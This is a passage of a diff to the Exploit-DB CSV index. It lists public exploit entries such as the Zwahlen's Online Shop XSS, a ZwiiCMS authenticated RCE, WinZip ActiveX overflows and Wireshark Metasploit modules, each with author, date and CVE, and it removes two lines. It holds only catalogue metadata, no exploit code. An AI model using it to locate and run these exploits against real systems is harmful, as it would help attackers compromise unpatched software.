28842,exploits/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 - 'Cat' Cross-Site Scripting",2006-10-23,MC.Iglo,webapps,php,,2006-10-23,2013-10-10,1,CVE-2006-5512;OSVDB-30007,,,,,https://www.securityfocus.com/bid/20682/info 15945,exploits/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion",2011-01-08,"Abdi Mohamed",webapps,php,,2011-01-08,2011-01-08,0,OSVDB-70395;CVE-2011-0505,,,,http://www.exploit-db.comzwii_5147.zip, -52050,exploits/php/webapps/52050.txt,"ZwiiCMS 12.2.04 - Remote Code Execution (Authenticated)",2024-06-14,ub3rsick,webapps,php,,2024-06-14,2024-06-14,0,,,,,, 24772,exploits/php/webapps/24772.txt,"Zwiki 0.10/0.36.2 - Cross-Site Scripting",2004-11-24,"Jeremy Bae",webapps,php,,2004-11-24,2013-03-14,1,CVE-2004-1075;OSVDB-12116,,,,,https://www.securityfocus.com/bid/11745/info 12454,exploits/php/webapps/12454.txt,"Zyke CMS 1.0 - Arbitrary File Upload",2010-04-29,indoushka,webapps,php,,2010-04-28,,1,,,,,, 12262,exploits/php/webapps/12262.php,"Zyke CMS 1.1 - Authentication Bypass",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",webapps,php,,2010-04-15,,0,,,,,http://www.exploit-db.comZykeCMSV1.0.zip, @@ -45730,7 +45725,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 3420,exploits/windows/remote/3420.html,"WinZip 10.0.7245 - FileView ActiveX Buffer Overflow (2)",2007-03-06,prdelka,remote,windows,,2007-03-05,,1,OSVDB-30432;CVE-2006-3890,,,,, 2785,exploits/windows/remote/2785.c,"WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow",2006-11-15,prdelka,remote,windows,,2006-11-14,2016-09-14,1,CVE-2006-6884,,,,http://www.exploit-db.comwinzip110.exe, 16607,exploits/windows/remote/16607.rb,"WinZip FileView - 'WZFILEVIEW.FileViewCtrl.61' ActiveX Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,,2010-04-30,2011-03-10,1,CVE-2006-5198;OSVDB-30433,"Metasploit Framework (MSF)",,,, -52032,exploits/windows/remote/52032.py,"Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure",2024-06-01,ub3rsick,remote,windows,,2024-06-01,2024-06-01,0,CVE-2021-38283,,,,, 18125,exploits/windows/remote/18125.rb,"Wireshark - console.lua pre-loading (Metasploit)",2011-11-19,Metasploit,remote,windows,,2011-11-19,2011-11-19,1,CVE-2011-3360;OSVDB-75347,"Metasploit Framework (MSF)",,,,http://technet.microsoft.com/en-us/security/advisory/2269637 11453,exploits/windows/remote/11453.py,"Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow",2010-02-15,"Nullthreat & Pure|Hate",remote,windows,,2010-02-14,2010-09-05,1,,,,http://www.exploit-db.com/screenshots/idlt11500/wire-poc.png,http://www.exploit-db.comwireshark-win32-1.2.5.exe, 17195,exploits/windows/remote/17195.rb,"Wireshark 1.4.4 - 'packet-dect.c' Remote Stack Buffer Overflow (Metasploit) (2)",2011-04-19,Metasploit,remote,windows,,2011-04-21,2011-04-21,1,CVE-2011-1591;OSVDB-71848,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwireshark-win32-1.4.1.exe,